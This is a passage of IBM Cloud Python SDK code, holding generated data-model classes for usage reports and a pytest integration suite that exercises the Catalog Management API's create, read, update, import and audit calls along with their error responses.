:attr float overage: (optional) The charges after exhausting subscription
credits and offers credits.
:attr List[Subscription] subscriptions: (optional) The list of subscriptions
applicable for the month.
"""
def __init__(self,
*,
overage: float = None,
subscriptions: List['Subscription'] = None) -> None:
"""
Initialize a SubscriptionSummary object.
:param float overage: (optional) The charges after exhausting subscription
credits and offers credits.
:param List[Subscription] subscriptions: (optional) The list of
subscriptions applicable for the month.
"""
self.overage = overage
self.subscriptions = subscriptions
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionSummary':
"""Initialize a SubscriptionSummary object from a json dictionary."""
args = {}
if 'overage' in _dict:
args['overage'] = _dict.get('overage')
if 'subscriptions' in _dict:
args['subscriptions'] = [Subscription.from_dict(x) for x in _dict.get('subscriptions')]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'overage') and self.overage is not None:
_dict['overage'] = self.overage
if hasattr(self, 'subscriptions') and self.subscriptions is not None:
_dict['subscriptions'] = [x.to_dict() for x in self.subscriptions]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionTerm():
"""
SubscriptionTerm.
:attr datetime start: The start date of the term.
:attr datetime end: The end date of the term.
:attr SubscriptionTermCredits credits: Information about credits related to a
subscription.
"""
def __init__(self,
start: datetime,
end: datetime,
credits: 'SubscriptionTermCredits') -> None:
"""
Initialize a SubscriptionTerm object.
:param datetime start: The start date of the term.
:param datetime end: The end date of the term.
:param SubscriptionTermCredits credits: Information about credits related
to a subscription.
"""
self.start = start
self.end = end
self.credits = credits
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionTerm':
"""Initialize a SubscriptionTerm object from a json dictionary."""
args = {}
if 'start' in _dict:
args['start'] = string_to_datetime(_dict.get('start'))
else:
raise ValueError('Required property \'start\' not present in SubscriptionTerm JSON')
if 'end' in _dict:
args['end'] = string_to_datetime(_dict.get('end'))
else:
raise ValueError('Required property \'end\' not present in SubscriptionTerm JSON')
if 'credits' in _dict:
args['credits'] = SubscriptionTermCredits.from_dict(_dict.get('credits'))
else:
raise ValueError('Required property \'credits\' not present in SubscriptionTerm JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionTerm object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'start') and self.start is not None:
_dict['start'] = datetime_to_string(self.start)
if hasattr(self, 'end') and self.end is not None:
_dict['end'] = datetime_to_string(self.end)
if hasattr(self, 'credits') and self.credits is not None:
_dict['credits'] = self.credits.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionTerm object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionTerm') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionTerm') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionTermCredits():
"""
Information about credits related to a subscription.
:attr float total: The total credits available for the term.
:attr float starting_balance: The unused credits in the term at the beginning of
the month.
:attr float used: The credits used in this month.
:attr float balance: The remaining credits in this term.
"""
def __init__(self,
total: float,
starting_balance: float,
used: float,
balance: float) -> None:
"""
Initialize a SubscriptionTermCredits object.
:param float total: The total credits available for the term.
:param float starting_balance: The unused credits in the term at the
beginning of the month.
:param float used: The credits used in this month.
:param float balance: The remaining credits in this term.
"""
self.total = total
self.starting_balance = starting_balance
self.used = used
self.balance = balance
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionTermCredits':
"""Initialize a SubscriptionTermCredits object from a json dictionary."""
args = {}
if 'total' in _dict:
args['total'] = _dict.get('total')
else:
raise ValueError('Required property \'total\' not present in SubscriptionTermCredits JSON')
if 'starting_balance' in _dict:
args['starting_balance'] = _dict.get('starting_balance')
else:
raise ValueError('Required property \'starting_balance\' not present in SubscriptionTermCredits JSON')
if 'used' in _dict:
args['used'] = _dict.get('used')
else:
raise ValueError('Required property \'used\' not present in SubscriptionTermCredits JSON')
if 'balance' in _dict:
args['balance'] = _dict.get('balance')
else:
raise ValueError('Required property \'balance\' not present in SubscriptionTermCredits JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionTermCredits object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'total') and self.total is not None:
_dict['total'] = self.total
if hasattr(self, 'starting_balance') and self.starting_balance is not None:
_dict['starting_balance'] = self.starting_balance
if hasattr(self, 'used') and self.used is not None:
_dict['used'] = self.used
if hasattr(self, 'balance') and self.balance is not None:
_dict['balance'] = self.balance
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionTermCredits object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionTermCredits') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionTermCredits') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
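# Illustrative sketch (not from the SDK source): a hypothetical 'terms' entry
# as consumed by SubscriptionTerm.from_dict() above; 'start'/'end' are parsed
# with string_to_datetime and 'credits' with SubscriptionTermCredits.from_dict.
#
#   {
#     "start": "2021-01-01T00:00:00Z",
#     "end": "2021-12-31T23:59:59Z",
#     "credits": {"total": 1000.0, "starting_balance": 1000.0,
#                 "used": 50.0, "balance": 950.0}
#   }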
class SupportSummary():
"""
SupportSummary.
:attr float cost: The monthly support cost.
:attr str type: The type of support.
:attr float overage: Additional support cost for the month.
"""
def __init__(self,
cost: float,
type: str,
overage: float) -> None:
"""
Initialize a SupportSummary object.
:param float cost: The monthly support cost.
:param str type: The type of support.
:param float overage: Additional support cost for the month.
"""
self.cost = cost
self.type = type
self.overage = overage
@classmethod
def from_dict(cls, _dict: Dict) -> 'SupportSummary':
"""Initialize a SupportSummary object from a json dictionary."""
args = {}
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in SupportSummary JSON')
if 'type' in _dict:
args['type'] = _dict.get('type')
else:
raise ValueError('Required property \'type\' not present in SupportSummary JSON')
if 'overage' in _dict:
args['overage'] = _dict.get('overage')
else:
raise ValueError('Required property \'overage\' not present in SupportSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SupportSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'type') and self.type is not None:
_dict['type'] = self.type
if hasattr(self, 'overage') and self.overage is not None:
_dict['overage'] = self.overage
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SupportSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SupportSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SupportSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
```
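A minimal usage sketch for the generated models above: `from_dict` validates the required properties and builds the model, and `to_dict` inverts it, so a round trip preserves equality (the models compare by `__dict__`). The payload values are hypothetical, and the import path is an assumption about where the upstream SDK exposes these classes.

```python
import json

# Assumption: in the upstream SDK these models are exposed from
# ibm_platform_services.usage_reports_v4; adjust the import if they live elsewhere.
from ibm_platform_services.usage_reports_v4 import OfferCredits

raw = '{"starting_balance": 100.0, "used": 25.0, "balance": 75.0}'  # hypothetical payload
credits = OfferCredits.from_dict(json.loads(raw))
assert credits.balance == 75.0

# to_dict() inverts from_dict(), and __eq__ compares __dict__,
# so the round trip preserves the model.
assert OfferCredits.from_dict(credits.to_dict()) == credits
```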
#### File: test/integration/test_catalog_management_v1.py
```python
import os
import pytest
from ibm_cloud_sdk_core import *
from ibm_platform_services.catalog_management_v1 import *
# Config file name
config_file = 'catalog_mgmt.env'
catalog_id = None
offering_id = None
object_id = None
version_locator_id = None
offering_instance_id = None
created_offering_ids = []
created_object_ids = []
kind_vpe = 'vpe'
kind_roks = 'roks'
kind_offering = 'offering'
repo_type_git_public = 'git_public'
object_name = 'object_created_by_python_sdk_5'
object_crn = 'crn:v1:bluemix:public:iam-global-endpoint:global:::endpoint:private.iam.cloud.ibm.com'
region_us_south = 'us-south'
namespace_python_sdk = 'python-sdk'
import_offering_zip_url = 'https://github.com/rhm-samples/node-red-operator/blob/master/node-red-operator/bundle/0.0' \
'.2/node-red-operator.v0.0.2.clusterserviceversion.yaml'
label_python_sdk = 'python-sdk'
bogus_revision = 'bogus-revision'
bogus_version_locator_id = 'bogus-version-locator-id'
class TestCatalogManagementV1():
"""
Integration Test Class for CatalogManagementV1
"""
@classmethod
def setup_class(cls):
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
cls.catalog_management_service_authorized = CatalogManagementV1.new_instance(
)
assert cls.catalog_management_service_authorized is not None
cls.catalog_management_service_not_authorized = CatalogManagementV1.new_instance(
'NOT_AUTHORIZED'
)
assert cls.catalog_management_service_not_authorized is not None
cls.config = read_external_sources(
CatalogManagementV1.DEFAULT_SERVICE_NAME)
assert cls.config is not None
cls.account_id = cls.config.get('ACCOUNT_ID')
assert cls.account_id is not None
cls.cluster_id = cls.config.get('CLUSTER_ID')
assert cls.cluster_id is not None
cls.git_auth_token = cls.config.get('GIT_TOKEN')
assert cls.git_auth_token is not None
cls.catalog_management_service_authorized.get_catalog_account()
authenticator_authorized = cls.catalog_management_service_authorized.get_authenticator()
token_manager_authorized = authenticator_authorized.token_manager
cls.refresh_token_authorized = token_manager_authorized.request_token()['refresh_token']
assert cls.refresh_token_authorized is not None
cls.catalog_management_service_not_authorized.get_catalog_account()
authenticator_unauthorized = cls.catalog_management_service_not_authorized.get_authenticator()
token_manager_unauthorized = authenticator_unauthorized.token_manager
cls.refresh_token_not_authorized = token_manager_unauthorized.request_token()['refresh_token']
assert cls.refresh_token_not_authorized is not None
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
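    # The two service clients created in setup_class exercise both sides of the
    # API: *_authorized uses the default credentials, while *_not_authorized is
    # built from the 'NOT_AUTHORIZED' config section and is used below to probe
    # the 4xx error paths.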
####
# Create Catalog
####
@needscredentials
def test_create_catalog_returns_400_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.create_catalog(
label=label_python_sdk,
tags=['sdk', 'python'],
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_catalog_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.create_catalog(
label=label_python_sdk,
revision=bogus_revision,
tags=['sdk', 'python'],
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_catalog(self):
global catalog_id
create_catalog_response = self.catalog_management_service_authorized.create_catalog(
label=label_python_sdk,
tags=['sdk', 'python'],
kind=kind_vpe,
owning_account=self.account_id,
)
assert create_catalog_response.get_status_code() == 201
catalog = create_catalog_response.get_result()
assert catalog is not None
assert catalog['id'] is not None
catalog_id = catalog['id']
####
# Get Catalog
####
@needscredentials
def test_get_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog(self):
assert catalog_id is not None
get_catalog_response = self.catalog_management_service_authorized.get_catalog(
catalog_identifier=catalog_id,
)
assert get_catalog_response.get_status_code() == 200
catalog = get_catalog_response.get_result()
assert catalog is not None
assert catalog['id'] == catalog_id
####
# Replace Catalog
####
@needscredentials
def test_replace_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.replace_catalog(
catalog_identifier=catalog_id,
id=catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_catalog_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.replace_catalog(
catalog_identifier=catalog_id,
id='invalid-'+catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_replace_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.replace_catalog(
catalog_identifier='invalid-'+catalog_id,
id='invalid-'+catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_catalog(self):
assert catalog_id is not None
update_tags = ['python', 'sdk', 'update']
replace_catalog_response = self.catalog_management_service_authorized.replace_catalog(
catalog_identifier=catalog_id,
id=catalog_id,
tags=update_tags,
owning_account=self.account_id,
kind=kind_vpe,
)
assert replace_catalog_response.get_status_code() == 200
catalog = replace_catalog_response.get_result()
assert catalog is not None
assert catalog['tags'] == update_tags
####
# List Catalog
####
@needscredentials
def test_list_catalogs(self):
assert catalog_id is not None
list_catalogs_response = self.catalog_management_service_authorized.list_catalogs()
assert list_catalogs_response.get_status_code() == 200
catalog_search_result = list_catalogs_response.get_result()
assert catalog_search_result is not None
assert next((catalog for catalog in catalog_search_result['resources']
if catalog['id'] == catalog_id),
None) is not None
####
# Create Offering
####
@needscredentials
def test_create_offering_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.create_offering(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_offering_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.create_offering(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name='offering created by python sdk',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.create_offering(
catalog_identifier=catalog_id,
id=catalog_id,
name='offering-created-by-python-sdk',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_offering(self):
global offering_id
global created_offering_ids
assert catalog_id is not None
for i in range(2):
create_offering_response = self.catalog_management_service_authorized.create_offering(
catalog_identifier=catalog_id,
label=label_python_sdk,
name='offering-created-by-python-sdk-'+str(i),
)
assert create_offering_response.get_status_code() == 201
offering = create_offering_response.get_result()
assert offering is not None
assert offering['id'] is not None
print('offering id: '+offering['id'])
if offering_id is None:
offering_id = offering['id']
created_offering_ids.append(offering['id'])
####
# Get Offering
####
@needscredentials
def test_get_offering_returns_404_when_no_such_offering(self):
assert offering_id is not None
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_returns_403_when_user_is_not_authorized(self):
assert offering_id is not None
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering(self):
assert offering_id is not None
assert catalog_id is not None
get_offering_response = self.catalog_management_service_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
assert get_offering_response.get_status_code() == 200
offering = get_offering_response.get_result()
assert offering is not None
assert offering['id'] == offering_id
assert offering['catalog_id'] == catalog_id
####
# Replace Offering
####
@needscredentials
def test_replace_offering_returns_404_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
id='invalid-'+offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_offering_returns_400_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated offering name by python sdk',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_replace_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_offering_returns_409_when_conflict_occurs(self):
assert catalog_id is not None
assert offering_id is not None
        # once the version-related conflict is resolved, this test will need a genuine conflict case
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 409
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering(self):
assert catalog_id is not None
assert offering_id is not None
# update conflict on revisions
updated_offering_name = 'updated-offering-by-python-sdk'
replace_offering_response = self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name=updated_offering_name,
)
assert replace_offering_response.get_status_code() == 200
offering = replace_offering_response.get_result()
assert offering is not None
assert offering['id'] == offering_id
assert offering['catalog_id'] == catalog_id
assert offering['name'] == updated_offering_name
####
# List Offerings
####
@needscredentials
def test_list_offerings_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.list_offerings(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_offerings_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_offerings(
catalog_identifier=catalog_id,
digest=True,
sort='bogus-sort-value'
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_offerings_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_offerings(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_list_offerings(self):
assert catalog_id is not None
        limit = 1
        offset = 0
        amount_of_offerings = 0
        # Page through the offerings one result at a time until the service
        # stops returning a 'next' link with an offset.
        while offset is not None:
            list_offerings_response = self.catalog_management_service_authorized.list_offerings(
                catalog_identifier=catalog_id,
                limit=limit,
                offset=offset,
            )
            assert list_offerings_response.get_status_code() == 200
            offering_search_result = list_offerings_response.get_result()
            assert offering_search_result is not None
            amount_of_offerings += len(offering_search_result.get('resources', []))
            next_url = offering_search_result.get('next')
            offset_value = get_query_param(next_url, 'offset') if next_url else None
            print('offset value: '+str(offset_value))
            offset = int(offset_value) if offset_value is not None else None
        print('Amount of offerings is: '+str(amount_of_offerings))
####
# Import Offering
####
@needscredentials
def test_import_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_vpe],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.3',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_import_offering_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=['rocks'],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2-patch',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_import_offering_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier='invalid-'+catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_import_offering(self):
global version_locator_id
assert catalog_id is not None
assert offering_id is not None
import_offering_response = self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
assert import_offering_response.get_status_code() == 201
offering = import_offering_response.get_result()
assert offering is not None
assert offering['kinds'][0]['versions'][0]['version_locator'] is not None
version_locator_id = offering['kinds'][0]['versions'][0]['version_locator']
@needscredentials
def test_import_offering_returns_409_when_conflict_occurs(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
                x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 409
####
# Reload Offering
####
@needscredentials
def test_reload_offering_returns_404_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
target_version='0.0.2',
target_kinds=kind_roks,
zipurl=import_offering_zip_url,
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_reload_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_version='0.0.2',
zipurl=import_offering_zip_url,
target_kinds=kind_vpe,
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_reload_offering(self):
assert catalog_id is not None
assert offering_id is not None
# Error: Could not find a kind with a target/format value of roks:operator for the current offering, Code: 400
reload_offering_response = self.catalog_management_service_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_version='0.0.2',
target_kinds=kind_roks,
zipurl=import_offering_zip_url,
repo_type=repo_type_git_public,
)
assert reload_offering_response.get_status_code() == 201
offering = reload_offering_response.get_result()
assert offering is not None
####
# Create Object
####
@needscredentials
def test_create_object_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=object_name,
crn=object_crn,
parent_id='bogus region name',
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_not_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=object_name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_object_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_authorized.create_object(
catalog_identifier='invalid-'+catalog_id,
catalog_id='invalid-'+catalog_id,
name=object_name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_object(self):
global object_id
global created_object_ids
assert catalog_id is not None
for i in range(2):
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
name = object_name+'_'+str(i)
create_object_response = self.catalog_management_service_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
assert create_object_response.get_status_code() == 201
catalog_object = create_object_response.get_result()
assert catalog_object is not None
assert catalog_object['id'] is not None
if object_id is None:
object_id = catalog_object['id']
created_object_ids.append(catalog_object['id'])
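# The ids collected in created_object_ids enable later cleanup. A hypothetical
# teardown sketch (assuming the service's delete_object operation) could be:
#
#     for oid in created_object_ids:
#         self.catalog_management_service_authorized.delete_object(
#             catalog_identifier=catalog_id,
#             object_identifier=oid,
#         )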
####
# Get Offering Audit
####
@needscredentials
def test_get_offering_audit_returns_200_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
get_offering_audit_response = self.catalog_management_service_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
assert get_offering_audit_response.get_status_code() == 200
@needscredentials
def test_get_offering_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_audit(self):
assert catalog_id is not None
assert offering_id is not None
get_offering_audit_response = self.catalog_management_service_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
assert get_offering_audit_response.get_status_code() == 200
audit_log = get_offering_audit_response.get_result()
assert audit_log is not None
####
# Get Catalog Account
####
@needscredentials
def test_get_catalog_account(self):
get_catalog_account_response = self.catalog_management_service_authorized.get_catalog_account()
assert get_catalog_account_response.get_status_code() == 200
account = get_catalog_account_response.get_result()
assert account is not None
assert account['id'] == self.account_id
####
# Update Catalog Account
####
@needscredentials
def test_update_catalog_account_returns_400_when_no_such_account(self):
try:
self.catalog_management_service_authorized.update_catalog_account(
id='invalid-'+self.account_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_update_catalog_account_returns_403_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.update_catalog_account(
id=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_catalog_account_returns_400_when_backend_input_validation_fails(self):
# the user is not granted this operation; a body with failing data would be sent here
update_catalog_account_response = self.catalog_management_service_authorized.update_catalog_account(
id=self.account_id,
hide_ibm_cloud_catalog=True,
)
assert update_catalog_account_response.get_status_code() == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_catalog_account(self):
# the user is not granted this operation, so this success path is skipped
update_catalog_account_response = self.catalog_management_service_authorized.update_catalog_account(
id=self.account_id,
)
assert update_catalog_account_response.get_status_code() == 200
assert update_catalog_account_response.get_result() is not None
####
# Get Catalog Account Audit
####
@needscredentials
def test_get_catalog_account_audit_returns_403_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.get_catalog_account_audit()
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog_account_audit(self):
get_catalog_account_audit_response = self.catalog_management_service_authorized.get_catalog_account_audit()
assert get_catalog_account_audit_response.get_status_code() == 200
assert get_catalog_account_audit_response.get_result() is not None
####
# Get Catalog Account Filters
####
@needscredentials
def test_get_catalog_account_filters_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog_account_filters(
catalog=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog_account_filters_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog_account_filters(
catalog='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_account_filters(self):
assert catalog_id is not None
get_catalog_account_filters_response = self.catalog_management_service_authorized.get_catalog_account_filters(
catalog=catalog_id,
)
assert get_catalog_account_filters_response.get_status_code() == 200
accumulated_filters = get_catalog_account_filters_response.get_result()
assert accumulated_filters is not None
####
# Get Catalog Audit
####
@needscredentials
def test_get_catalog_audit_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog_audit(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog_audit(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
